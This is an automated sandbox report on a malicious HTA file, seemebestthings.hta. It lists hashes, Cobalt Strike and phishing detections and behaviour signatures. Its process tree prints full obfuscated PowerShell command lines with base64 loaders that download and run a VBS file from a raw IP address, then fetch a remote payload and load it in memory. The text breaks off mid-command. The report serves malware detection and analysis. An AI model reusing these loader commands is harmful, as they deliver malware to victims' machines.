Edit tour
Windows
Analysis Report
seemebestthings.hta
Overview
General Information
| Sample name: | seemebestthings.hta |
| Analysis ID: | 1564725 |
| MD5: | b89e0d07bac575aa9381611fa00ea4a0 |
| SHA1: | 53a71effb8401e97f8e8e1f2522a0289e2b58745 |
| SHA256: | 6bfa3b21293ad79037e13886fd6b0b3c0ee8afdc1422ba2748ade815db010aa7 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, HTMLPhisher
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7328 cmdline: mshta.exe "C:\Users\ user\Deskt op\seemebe stthings.h ta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 7400 cmdline: "C:\Window s\system32 \cmd.exe" "/C POwErS HeLL -EX b yPasS -noP -w 1 -C dEvICE cReDEnTial DepLOYMeNt ; invOkE- ExPREsSiOn ($(invOKe- expreSSIon ('[sYStEM. TExt.EnCOd INg]'+[ChA R]0X3a+[cH ar]58+'Utf 8.GETStRIN G([sYsTem. coNVeRT]'+ [cHAr]58+[ chaR]58+'f romBASE64S tring('+[C haR]0X22+' JHFidmRDTl AzWCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg YURELVRZUG UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIC1NZW1i ZXJERUZJTk lUaW9OICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgidVJM TW9uIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIEZO cEpJS3Asc3 RyaW5nICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICB5 R09zTE1jLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ckFuYlBOLH VpbnQgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIFhu VmJyQyxJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGto enNHaU9LKT snICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbmFt RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgImpMYm ZUSnJTSXVq IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLW5BbW VzUGFjZSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg QXcgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1QYX NzVGhydTsg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICRxYnZkQ0 5QM1g6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xNzIu MjQ1LjEyMy 4yOS8xMzQz L3NlZW1lYm VzdHRoaW5n c3dpdGhlbn RpcmV0aGlu Z3N3aXRoZ3 JlYXRuYXR1 cmV0aGluZ3 MudElGIiwi JGVuVjpBUF BEQVRBXHNl ZW1lYmVzdH RoaW5nc3dp dGhlbnRpcm V0aGluZ3N3 aXRoZ3JlYX RuYXR1cmV0 aGluZy52Yl MiLDAsMCk7 c1RhUlQtU0 xlZVAoMyk7 aUkgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICIkRW 52OkFQUERB VEFcc2VlbW ViZXN0dGhp bmdzd2l0aG VudGlyZXRo aW5nc3dpdG hncmVhdG5h dHVyZXRoaW 5nLnZiUyI= '+[CHaR]34 +'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7452 cmdline: POwErSHeLL -EX byPa sS -n oP -w 1 -C dEvICEcRe DEnTialDep LOYMeNt ; invOkE-ExP REsSiOn($( invOKe-exp reSSIon('[ sYStEM.TEx t.EnCOdINg ]'+[ChAR]0 X3a+[cHar] 58+'Utf8.G ETStRING([ sYsTem.coN VeRT]'+[cH Ar]58+[cha R]58+'from BASE64Stri ng('+[ChaR ]0X22+'JHF idmRDTlAzW CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYUR ELVRZUGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1NZW1iZXJ ERUZJTklUa W9OICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgidVJMTW9 uIiwgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENoY XJTZXQgPSB DaGFyU2V0L lVuaWNvZGU pXXB1YmxpY yBzdGF0aWM gZXh0ZXJuI EludFB0ciB VUkxEb3dub G9hZFRvRml sZShJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEZOcEp JS3Asc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICB5R09 zTE1jLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgckF uYlBOLHVpb nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFhuVmJ yQyxJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGtoenN HaU9LKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtbmFtRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gImpMYmZUS nJTSXVqIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5BbWVzU GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQXc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1QYXNzV GhydTsgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICR xYnZkQ05QM 1g6OlVSTER vd25sb2FkV G9GaWxlKDA sImh0dHA6L y8xNzIuMjQ 1LjEyMy4yO S8xMzQzL3N lZW1lYmVzd HRoaW5nc3d pdGhlbnRpc mV0aGluZ3N 3aXRoZ3JlY XRuYXR1cmV 0aGluZ3Mud ElGIiwiJGV uVjpBUFBEQ VRBXHNlZW1 lYmVzdHRoa W5nc3dpdGh lbnRpcmV0a GluZ3N3aXR oZ3JlYXRuY XR1cmV0aGl uZy52YlMiL DAsMCk7c1R hUlQtU0xlZ VAoMyk7aUk gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICIkRW52O kFQUERBVEF cc2VlbWViZ XN0dGhpbmd zd2l0aGVud GlyZXRoaW5 nc3dpdGhnc mVhdG5hdHV yZXRoaW5nL nZiUyI='+[ CHaR]34+') )')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 7580 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\dk54el2n \dk54el2n. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7600 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S9C55.tmp" "c:\Users \user\AppD ata\Local\ Temp\dk54e l2n\CSC71B E0DF5A47E4 08EAC9C81C 5574F338.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
wscript.exe (PID: 7672 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeme bestthings withentire thingswith greatnatur ething.vbS " MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnNEFtb2 NoYXZpbGhh ID0gc0lXaH R0cHM6Ly8z MTAnKyc1Lm ZpbGVtYWls LmNvbS9hcG kvZmlsZS9n ZXQ/ZmlsZW tleT1zaFRQ SCcrJ2JDUF g4bycrJy1s T3RDcUhMRz ZfMHgnKydD eS14bDR0bn hsQVZiUTk1 LWR2JysnaV RLNWNBUicr J2FOZFFqYm IzbWV4ZndR ekttVFhnJn NraXByZWc9 dHJ1ZSZwa1 92aScrJ2Q9 ZTAxJysnMD k2MzhjOWJm Yjk1NzE3Mz I1MzEnKycz MDliNWZmN2 Mgc0lXOzRB bXRyaWNoaX NtbyA9IE5l dy1PYmplY3 QgU3lzdGVt Lk5ldC5XZW JDbGllbnQ7 NEFtbGluZm 90b21pYSA9 ICcrJzRBbX RyaWNoaXNt by5Eb3dubG 9hZERhdGEo NEFtbycrJ2 NoYXZpbGhh KTs0QW1wcm VzdW0nKydw dHUnKydvc2 8gPSBbU3lz dGVtLlRleH QuRW5jb2Rp bmddOjpVVE Y4LkdldFN0 cmluZyg0Jy snQW1saW5m b3RvbScrJ2 lhKTs0QW1u aXRpZHVsYX IgPSBzSVc8 PEJBJysnU0 U2NF9TVEFS VD4+c0lXOz RBbW9idm9s dmlkbyA9IH NJVycrJzw8 QkFTRTYnKy c0X0VORD4+ c0lXOzRBbW xvZ29ncmlm byA9IDRBbX ByJysnZXN1 bXB0dW9zby 5JbmRleE9m KDRBbW5pdG knKydkdWxh cicrJyk7NE FtdG9saGlk byA9IDRBbX ByZXN1bXB0 dW9zby5Jbm RleE9mKDRB bW8nKydidm 9sdmlkbyk7 NEFtbG9nb2 dyaWZvIC1n ZSAwIC1hbm QgNEFtdG9s aGlkbyAtZ3 QgNEFtbG9n b2dyaWZvOz RBbWxvZ29n cmlmbyArPS A0QW1uaXRp ZHVsYXIuTG VuZycrJ3Ro OzRBbXZpbm RpdGEgPSA0 QW10b2xoaW RvIC0gNEFt bG9nb2dyaW ZvOzRBbScr J2ZpZ2EgPS A0QW1wcmVz dW1wdHVvc2 8uU3Vic3Ry aW5nKDRBbW xvZ29ncmlm bywgNEFtdm luZGl0YSk7 NEFtYW50aW dhbWVudGUg PSAtam9pbi AoNEFtZmln YS5UbycrJ0 NoYXJBcnJh JysneSgpIF MnKydFMiBG b3JFYWNoLU 9iamUnKydj dCB7IDRBbV 8gfSlbLTEu Li0oNEFtZm lnYS5MZW5n dGgpXTs0QW 1tYScrJ3Jt b3InKydpem FyJysnID0g WycrJ1N5c3 RlbS5Db252 ZXJ0XTo6Rn JvbUJhc2U2 NFN0cmluZy g0QW1hbnRp Z2FtZW50ZS k7NEFtZGVz ZW1tYWRlaX JhciA9IFtT eXN0ZW0uUm VmbGVjdGlv bi5Bc3NlbW InKydseV06 OkxvYWQoNE FtbWFybW9y aXphcik7NE FtcG9lJysn dGlmaWNhci A9IFtkbmxp Yi5JTy5Ib2 1lXS5HZXRN ZXRob2Qocy crJ0lXVkFJ cycrJ0lXKT s0QW0nKydw b2V0aWZpY2 FyLkludm9r ZSg0QW1udW xsLCBAKHNJ V3R4dC5WR0 ZSRS8zNDMx LzkyLjMyMS 41NDIuMjcx Ly86cHR0aH NJVywgc0lX NEFtZGUnKy dzdW5pZmlj YXJzSVcsIH NJVzRBbWRl c3VuaWZpY2 Fyc0lXLCBz SVc0QW1kZX N1bmlmaWNh cnNJVywgc0 lXYXNwbmV0 X2NvbXBpbG Vyc0lXLCBz SVc0JysnQW 1kZXN1bmlm aWNhcnNJVy wgc0lXNEFt ZGVzdW5pZm ljYXJzSVcs c0lXNEFtZG VzdW5pZmlj YScrJ3JzSV csc0lXNEFt ZGVzdW5pZm ljYXJzSVcs c0lXNEFtZG VzdW5pZmlj YXJzSVcsc0 lXNEFtZGVz dW5pZmljYX JzSVcsc0lX NEFtZGVzdW 5pZmljYXJz SVcsc0lXMX NJVyxzSScr J1c0QW1kZX N1bmlmaWNh cnNJVykpOy cpIC1jUkVQ bEFjZSAoW2 NoYVJdNTIr W2NoYVJdNj UrW2NoYVJd MTA5KSxbY2 hhUl0zNiAt Y1JFUGxBY2 UgJ3NJVycs W2NoYVJdMz kgIC1jUkVQ bEFjZShbY2 hhUl04Mytb Y2hhUl02OS tbY2hhUl01 MCksW2NoYV JdMTI0KSB8 ICYoICRFTn Y6Q29tc3BF Y1s0LDI0LD I1XS1Kb2lO Jycp';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic